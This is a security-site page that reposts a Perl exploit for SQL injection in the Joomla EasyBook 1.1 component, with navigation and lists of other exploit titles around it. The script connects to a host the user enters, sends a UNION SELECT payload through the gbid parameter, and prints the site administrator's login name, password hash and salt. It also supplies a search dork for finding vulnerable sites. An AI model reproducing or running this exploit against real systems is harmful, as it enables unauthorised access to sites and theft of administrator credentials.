首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit
来源:http://antichat.ru 作者:ZAMUT 发布时间:2008-06-05  
#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example:                             #
# Host: xxx.lu                 #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+--                                                      --+-\n";
print "-+--            Author: ZAMUT                             --+-\n";
print "-+--            Vuln: gbid=                               --+-\n";
print "-+--            Homepage: http://antichat.ru              --+-\n";
print "-+--            Dork: com_easybook                        --+-\n\n";

print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket  "POST /index.php HTTP/1.0\n".
               "Host: www.$host\n".
   "Content-Type: application/x-www-form-urlencoded\n".
   "Content-Length: 214\n\n".
               "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
  while(<$socket>)
  {
$s = <$socket>;
if($s=~/:::(.+):::/){
   $lhs = $1;
       ($l,$h,$s)=split(':',$lhs);
   print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
   close $socket;
   exit; }
  }
  die ("Exploit failed!");

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·HT Editor File openning Stack
·Unreal IRCD 3.2.8.1 Remote Dow
  相关文章
·HP StorageWorks NSI Double Tak
·Akamai Download Manager < 2.2.
·Joomla Component jotloader <=
·Black Ice Software Inc Barcode
·ipbProArcade 2.5.1 (user) Remo
·Black Ice Software Inc Barcode
·Joomla Component JooBlog 0.1.1
·Asterisk (SIP channel driver /
·C6 Messenger ActiveX Remote Do
·Black Ice Software Inc Barcode
·MDaemon <= 9.6.5 Multiple Remo
·Galatolo Web Manager <= 1.0 Re
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved